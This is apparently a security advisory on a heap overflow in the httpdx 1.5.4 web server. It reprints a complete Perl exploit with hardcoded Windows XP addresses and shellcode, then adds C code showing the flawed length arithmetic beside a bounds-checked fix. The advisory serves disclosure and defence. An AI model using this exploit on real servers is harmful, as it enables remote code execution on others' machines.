Release date: 2012-07-29
Update date: 2012-07-31
Affected systems:
httpdx httpdx 1.5.4
httpdx httpdx 1.5.3b
httpdx httpdx 1.5.3
httpdx httpdx 1.5.2
httpdx httpdx 1.5
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54712

httpdx is a lightweight HTTP and FTP server.

httpdx 1.5.4 and earlier contain a remote heap buffer overflow. According to the published exploit, when handling a POST request httpdx allocates a body buffer of Content-Length + 1 bytes but copies (request length - header length) bytes into it, so a request whose body is longer than its declared Content-Length writes past the end of the heap allocation. An attacker can exploit this to execute arbitrary code in the context of the affected application.

<*Source: st3n *>

Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!

st3n () provided the following test method:
#!/usr/bin/perl -w
#======================================================================
# Exploit Title: httpdx <= 1.5.4 Remote Heap Overflow
# Date: 28 July 2012
# Exploit Author: st3n [at sign] funoverip [dot] net
# Vendor Homepage: http://httpdx.sourceforge.net
# Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download
# Version: 1.5.4
# Tested on: WinXP SP1
#======================================================================
# Additional notes:
# -----------------
#
# - During a POST request, httpdx allocates memory with malloc(size+1),
#   where "size" is actually the value of the "Content-Length" HTTP header.
#   All post-data will then be copied into this area using strncpy(x,y,size2),
#   where "size2" = "request length" - "header length" (and not Content-Length).
#
# - As httpdx uses its own handler function upon crash, this exploit overwrites
#   the first _VECTORED_EXCEPTION_NODE structure with a pointer to our shellcode.
#
# - The exploit works very often, but not always. In both cases, httpdx crashes
#   after the exploit.
#
# - WinXP SP1
#   0x77ED73B4 --> UnhandledExceptionFilter()
#======================================================================
use strict;
use IO::Socket::INET;

# target
my $host = "127.0.0.1";

# The [perl|php|py|..] page to call during the POST request.
# The page must exist and the extension must be defined in the directive
# "http.handlers = {...}" in httpdx.conf
my $page = "/test.pl";

# Windows XP - SP1 - English
# ---------------------------
# ptr to the first _VECTORED_EXCEPTION_NODE structure = 0x77fc3210 - 4
my $veh_node_addr = 0x77fc320c;
# pointer to our shellcode => 0x00227664 - 8 = 0x0022765c
my $sc_ptr = 0x0022765c;

# shellcode
# (msfvenom -p windows/exec -f perl CMD=calc.exe)
my $shellcode =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" .
"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" .
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" .
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" .
"\x65\x78\x65\x00";

# flush after every write
$| = 1;

my $sock = IO::Socket::INET->new("$host:80")
    or die "cannot connect to $host:80: $!";

# The declared Content-Length (1023) sizes the heap buffer at 1024 bytes,
# but the body actually sent is 1032 + 8 = 1040 bytes, so the copy runs
# 16 bytes past the allocation and the two trailing dwords land in the
# neighbouring heap chunk (see the notes above for the intended effect).
print $sock "POST $page HTTP/1.0\r\n" .
    "Content-Length: 1023\r\n" .
    "Content-Type: text\r\n" .
    "Host: $host" . "\r\n" .
    "\r\n" .
    # shellcode
    $shellcode .
    # nops
    "\x90" x (1032-length($shellcode)) .
    # VEH addr
    pack("V", $veh_node_addr) .
    # ptr to shellcode
    pack("V", $sc_ptr)
    ;

# print the response, if any ...
while(<$sock>){
    print $_;
}
exit;

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

httpdx
------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://httpdx.sourceforge.net/
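Until a vendor fix is available, the check a corrected body reader needs is easy to state. The following C is an added illustration, neither httpdx's source nor the exploit author's code: it models the vulnerable arithmetic the exploit notes describe (allocate Content-Length + 1, copy request length minus header length) beside a reader that derives both the allocation and the copy length from Content-Length and rejects a body that does not match it. The request layout, the function names and the 1 MiB cap are assumptions, and the sample request is constructed rather than captured.

```c
#include <ctype.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Length of the header block including the blank line, or -1 if incomplete. */
long header_length_of(const char *req, size_t len)
{
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(req + i, "\r\n\r\n", 4) == 0)
            return (long)(i + 4);
    return -1;
}

static int ieq(const char *a, const char *b, size_t n)   /* case-insensitive memcmp == 0 */
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}

/* Content-Length value within the first hdr_len bytes; -1 if absent, non-numeric or too large. */
long content_length_of(const char *req, size_t hdr_len)
{
    const char *key = "content-length:";
    size_t klen = strlen(key);
    for (size_t i = 0; i + klen <= hdr_len; i++) {
        if (i > 0 && req[i - 1] != '\n') continue;            /* header names start a line */
        if (!ieq(req + i, key, klen)) continue;
        size_t p = i + klen;
        while (p < hdr_len && (req[p] == ' ' || req[p] == '\t')) p++;
        if (p >= hdr_len || !isdigit((unsigned char)req[p])) return -1;
        long v = 0;
        for (; p < hdr_len && isdigit((unsigned char)req[p]); p++) {
            if (v > (LONG_MAX - 9) / 10) return -1;
            v = v * 10 + (req[p] - '0');
        }
        return v;
    }
    return -1;
}

/* The vulnerable arithmetic as the advisory describes it, computed but not performed:
 * *alloc = Content-Length + 1 (the malloc size); returns request length - header length
 * (the strncpy size), or 0 if the request is unparsable or carries no body. */
size_t vulnerable_copy_len(const char *req, size_t len, size_t *alloc)
{
    long hl = header_length_of(req, len);
    long cl = hl < 0 ? -1 : content_length_of(req, (size_t)hl);
    if (cl < 0) return 0;
    *alloc = (size_t)cl + 1;
    return len - (size_t)hl;
}

#define MAX_BODY (1024 * 1024)   /* assumed policy cap; not a value taken from httpdx */
/* Bounded reader: buffer size and copy length both derive from Content-Length, and a
 * body whose received length differs from the declared one is rejected (a streaming
 * server would read more when fewer bytes have arrived; this models one buffer).
 * Returns a NUL-terminated copy the caller frees, or NULL. */
char *read_post_body_safe(const char *req, size_t len, size_t *body_len)
{
    long hl = header_length_of(req, len);
    long cl = hl < 0 ? -1 : content_length_of(req, (size_t)hl);
    if (cl < 0 || cl > MAX_BODY) return NULL;
    if (len - (size_t)hl != (size_t)cl) return NULL;     /* declared != received */
    char *body = malloc((size_t)cl + 1);
    if (!body) return NULL;
    memcpy(body, req + hl, (size_t)cl);                  /* bounded by the allocation */
    body[cl] = '\0';
    *body_len = (size_t)cl;
    return body;
}

/* Constructed sample request (not a captured exploit): declared Content-Length and
 * actual body length are chosen independently. Returns its length, or 0 if it does not fit. */
size_t build_request(size_t declared, size_t actual, char *out, size_t cap)
{
    int n = snprintf(out, cap, "POST /test.pl HTTP/1.0\r\nContent-Length: %zu\r\n"
                     "Content-Type: text\r\nHost: 127.0.0.1\r\n\r\n", declared);
    if (n < 0 || (size_t)n + actual >= cap) return 0;
    memset(out + n, 'A', actual);
    return (size_t)n + actual;
}

/* Bytes the vulnerable path would write past its allocation for a request declaring
 * `declared` body bytes but carrying `actual`; 0 when the copy fits. */
size_t overflow_bytes(size_t declared, size_t actual)
{
    char req[4096];
    size_t alloc = 0, copy, n = build_request(declared, actual, req, sizeof req);
    if (!n || !(copy = vulnerable_copy_len(req, n, &alloc)) || copy <= alloc) return 0;
    return copy - alloc;
}
```

For the shape the exploit sends (Content-Length: 1023 with a 1040-byte body), overflow_bytes(1023, 1040) reports 16 bytes written past the 1024-byte buffer, while read_post_body_safe returns NULL for the same request. Rejecting the mismatch is a design choice; truncating the copy to Content-Length would equally remove the overflow, since what matters is that the copy length and the allocation are derived from the same value.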